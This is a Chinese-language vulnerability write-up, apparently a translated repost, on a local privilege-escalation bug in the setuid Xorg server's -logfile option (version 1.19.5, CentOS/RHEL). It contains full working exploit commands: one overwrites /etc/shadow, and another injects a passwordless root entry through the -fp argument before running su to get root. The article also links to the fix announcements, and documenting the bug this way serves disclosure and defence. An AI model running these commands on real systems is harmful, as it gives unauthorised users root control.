Xorg X Server权限提升漏洞是怎样的,相信很多没有经验的人对此束手无策,为此本文总结了问题出现的原因和解决方法,通过这篇文章希望你能解决这个问题。
任意文件覆盖导致的提权漏洞
由合天网安实验室翻译
描述:
X.org X Server应用程序允许低权限的用户在系统的任何位置创建或覆盖文件,包括特色文件(如:/etc/shadow)。
攻击条件:拥有普通用户的控制台会话权限
靶机:
-
CentOS-7
-
[narendra@localhost ~]$ uname -a
-
Linux localhost.localdomain 4.18.11-1.el7.elrepo.x86_64 #1 SMP Sat Sep 29 09:42:38 EDT 2018 x86_64 x86_64 xGNU/Linux
X.Org X server 版本:1.19.5
分析:
在CentOS和RedHat服务器操作系统上,X.org X Server 可执行文件(/usr/bin/Xorg)具有SETUID权限。
-
[Dev@localhost ~]$ ls -la /usr/bin/Xorg
-
-rwsr-xr-x. 1 root root 2409344 Apr 11 22:12 /usr/bin/Xorg
X.org X Server 应用程序中 LogInit()函数用来记录日志,X.org X Server 允许用户使用 “-logfile”选项指定日志文件。
如果系统上已存在与用户提供的"”同名的文件,则将其重命名为“.old”。完成此操作后,将使用用户提供的“”名称创建一个新文件,使用fopen()函数进行调用
Xorg-Server/os/log.c
-
244 const char *
-
245 LogInit(const char *fname, const char *backup)
-
246 {
-
247 char *logFileName = NULL;
-
248
-
249 if (fname && *fname) {
-
250 if (displayfd != -1) {
-
251 /* Display isn't set yet, so we can't use it in filenames yet. */
-
252 char pidstring[32];
-
253 snprintf(pidstring, sizeof(pidstring), "pid-%ld",
-
254 (unsigned long) getpid());
-
255 logFileName = LogFilePrep(fname, backup, pidstring);
-
256 saved_log_tempname = logFileName;
-
257
-
258 /* Save the patterns for use when the display is named. */
-
259 saved_log_fname = strdup(fname);
-
260 if (backup == NULL)
-
261 saved_log_backup = NULL;
-
262 else
-
263 saved_log_backup = strdup(backup);
-
264 } else
-
265 logFileName = LogFilePrep(fname, backup, display);
-
266 if ((logFile = fopen(logFileName, "w")) == NULL)
-
267 FatalError("Cannot open log file /"%s/"/n", logFileName);
-
268 setvbuf(logFile, NULL, _IONBF, 0);
-
269
-
270 logFileFd = fileno(logFile);
可以使用 strace命令跟踪系统底层的 open() 调用过程
-
stat("mylogfile", 0x7ffcb9654ed0) &n-1 ENOENT (No such file or directory)
-
open("mylogfile", O_WRONLY|O_CREAT|O_TRUNC, 0666) = 4
-
rt_sigaction(SIGALRM, {0x55b6e2c2ca70, [ALRM], SA_RESTORER|SA_RESTART, 0x7fb0353036d0}, NULL, 8) = 0
从跟踪日志可以看出,O_EXCL 标志没有设置,所以fopen() 函数会创建或者覆盖已有的文件。
漏洞利用:
主要利用以下3点:
1、fopen()调用的输入是用户可控的文件名
2、fopen()将创建或覆盖已存在的文件
3、可执行文件/usr/bin/Xorg具有setuid权限
/etc/shadow 文件覆盖测试
-
[Dev@localhost ~]$ uname -r
-
3.10.0-862.el7.x86_64
-
[Dev@localhost ~]$ Xorg -version
-
X.Org X Server 1.19.5
-
Release Date: 2017-10-12
-
X Protocol Version 11, Revision 0
-
Build Operating System: 2.6.32-696.18.7.el6.x86_64
-
Current Operating System: Linux localhost.localdomain 3.10.0-862.el7.x86_64 #1 SMP Wed Mar 21 18:14:51 EDT 2018 x86_64
-
Kernel command line: BOOT_IMAGE=/vmlinuz-3.10.0-862.el7.x86_64 root=/dev/mapper/rhel-root ro crashkernel=auto rd.lvm.lv=rhel/root rd.lvm.lv=rhel/swap rhgb quiet LANG=en_US.UTF-8
-
Build Date: 13 February 2018 02:39:52PM
-
Build ID: xorg-x11-server 1.19.5-5.el7
-
Current version of pixman: 0.34.0
-
Before reporting problems, check http://wiki.x.org to make sure that you have the latest version.
-
[Dev@localhost ~]
-
[Dev@localhost ~]$ id
-
uid=1000(Dev) gid=1000(Dev) groups=1000(Dev) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023
-
[Dev@localhost ~]$
-
[Dev@localhost ~]$ cd /etc
-
[Dev@localhost etc]$ ls -la shadow
-
----------. 1 root root 1650 Oct 6 05:03 shadow
-
[Dev@localhost etc]$
-
[Dev@localhost etc]$ cat shadow
-
cat: shadow: Permission denied
-
[Dev@localhost etc]$
-
[Dev@localhost etc]$ Xorg -logfile shadow :1 #指定日志文件为shadow
-
X.Org X Server 1.19.5
-
Release Date: 2017-10-12
-
X Protocol Version 11, Revision 0
-
Build Operating System: 2.6.32-696.18.7.el6.x86_64
-
Current Operating System: Linux localhost.localdomain 3.10.0-862.el7.x86_64 #1 SMP Wed Mar 21 18:14:51 EDT 2018 x86_64
-
Kernel command line: BOOT_IMAGE=/vmlinuz-3.10.0-862.el7.x86_64 root=/dev/mapper/rhel-root ro crashkernel=auto rd.lvm.lv=rhel/root rd.lvm.lv=rhel/swap rhgb quiet LANG=en_US.UTF-8
-
Build Date: 13 February 2018 02:39:52PM
-
Build ID: xorg-x11-server 1.19.5-5.el7
-
Current version of pixman: 0.34.0
-
Before reporting problems, check http://wiki.x.org to make sure that you have the latest version.
-
Markers: (--) probed, (**) from config file, (==) default setting,
-
(++) from command line, (!!) notice, (II) informational,
-
(WW) warning, (EE) error, (NI) not implemented, (??) unknown.
-
(++) Log file: "shadow", Time: Sat Oct 6 21:54:13 2018
-
(==) Using config directory: "/etc/X11/xorg.conf.d"
-
(==) Using system config directory "/usr/share/X11/xorg.conf.d"
-
^Cerror setting MTRR (base = 0x00000000e0000000, size = 0x01700000, type = 1) Invalid argument (22)
-
(II) Server terminated successfully (0). Closing log file.
-
[Dev@localhost etc]$
-
[Dev@localhost etc]$
-
[Dev@localhost etc]$ ls -la shadow
-
-rw-r--r--. 1 root Dev 53901 Oct 6 21:54 shadow
-
[Dev@localhost etc]$
-
[Dev@localhost etc]$ head shadow #写入成功
-
[ 11941.870]
-
X.Org X Server 1.19.5
-
Release Date: 2017-10-12
-
[ 11941.870] X Protocol Version 11, Revision 0
-
[ 11941.870] Build Operating System: 2.6.32-696.18.7.el6.x86_64
-
[ 11941.870] Current Operating System: Linux localhost.localdomain 3.10.0-862.el7.x86_64 #1 SMP Wed Mar 21 18:14:51 EDT 2018 x86_64
-
[ 11941.870] Kernel command line: BOOT_IMAGE=/vmlinuz-3.10.0-862.el7.x86_64 root=/dev/mapper/rhel-root ro crashkernel=auto rd.lvm.lv=rhel/root rd.lvm.lv=rhel/swap rhgb quiet LANG=en_US.UTF-8
-
[ 11941.870] Build Date: 13 February 2018 02:39:52PM
-
[ 11941.870] Build ID: xorg-x11-server 1.19.5-5.el7
-
[ 11941.870] Current version of pixman: 0.34.0
-
[Dev@localhost etc]$
权限提升
-
[Dev@localhost ~]$ id #当前权限
-
uid=1000(Dev) gid=1000(Dev) groups=1000(Dev) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023
-
[Dev@localhost ~]$
-
[Dev@localhost ~]$ cd /etc
-
[Dev@localhost etc]$
-
[Dev@localhost etc]$ ls -la shadow
-
----------. 1 root root 1241 Oct 10 01:15 shadow
-
[Dev@localhost etc]$
-
[Dev@localhost etc]$ cat shadow #查看权限
-
cat: shadow: Permission denied
-
[Dev@localhost etc]$
-
[Dev@localhost etc]$ Xorg -fp "root::16431:0:99999:7:::" -logfile shadow :1 #写入文件,root无密码
-
X.Org X Server 1.19.5
-
Release Date: 2017-10-12
-
X Protocol Version 11, Revision 0
-
Build Operating System: 3.10.0-693.17.1.el7.x86_64
-
Current Operating System: Linux localhost.localdomain 3.10.0-862.14.4.el7.x86_64 #1 SMP Wed Sep 26 15:12:11 UTC 2018 x86_64
-
Kernel command line: BOOT_IMAGE=/vmlinuz-3.10.0-862.14.4.el7.x86_64 root=/dev/mapper/centos-root ro crashkernel=auto rd.lvm.lv=centos/root rd.lvm.lv=centos/swap rhgb quiet LANG=en_US.UTF-8
-
Build Date: 11 April 2018 04:40:54PM
-
Build ID: xorg-x11-server 1.19.5-5.el7
-
Current version of pixman: 0.34.0
-
Before reporting problems, check http://wiki.x.org
-
to make sure that you have the latest version.
-
Markers: (--) probed, (**) from config file, (==) default setting,
-
(++) from command line, (!!) notice, (II) informational,
-
(WW) warning, (EE) error, (NI) not implemented, (??) unknown.
-
(++) Log file: "shadow", Time: Wed Oct 10 01:16:10 2018
-
(==) Using config directory: "/etc/X11/xorg.conf.d"
-
(==) Using system config directory "/usr/share/X11/xorg.conf.d"
-
^Cerror setting MTRR (base = 0x00000000e0000000, size = 0x01700000, type = 1) Invalid argument (22)
-
(II) Server terminated successfully (0). Closing log file.
-
[Dev@localhost etc]$ ls -la shadow
-
-rw-r--r--. 1 root Dev 53897 Oct 10 01:16 shadow
-
[Dev@localhost etc]$
-
[Dev@localhost etc]$ cat shadow | grep "root::" #写入文件成功
-
root::16431:0:99999:7:::
-
[Dev@localhost etc]$
-
[Dev@localhost etc]$
-
[Dev@localhost etc]$ su #切换到root用户
-
[root@localhost etc]#
-
[root@localhost etc]# id #查看权限,提权成功
-
uid=0(root) gid=0(root) groups=0(root) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023
修复信息:
https://lists.x.org/archives/xorg-announce/2018-October/002927.htmlhttps://lists.x.org/archives/xorg-announce/2018-October/002928.html
看完上述内容,你们掌握Xorg X Server权限提升漏洞是怎样的的方法了吗?如果还想学到更多技能或想了解更多相关内容,欢迎关注亿速云行业资讯频道,感谢各位的阅读!
原创文章,作者:bd101bd101,如若转载,请注明出处:https://blog.ytso.com/222339.html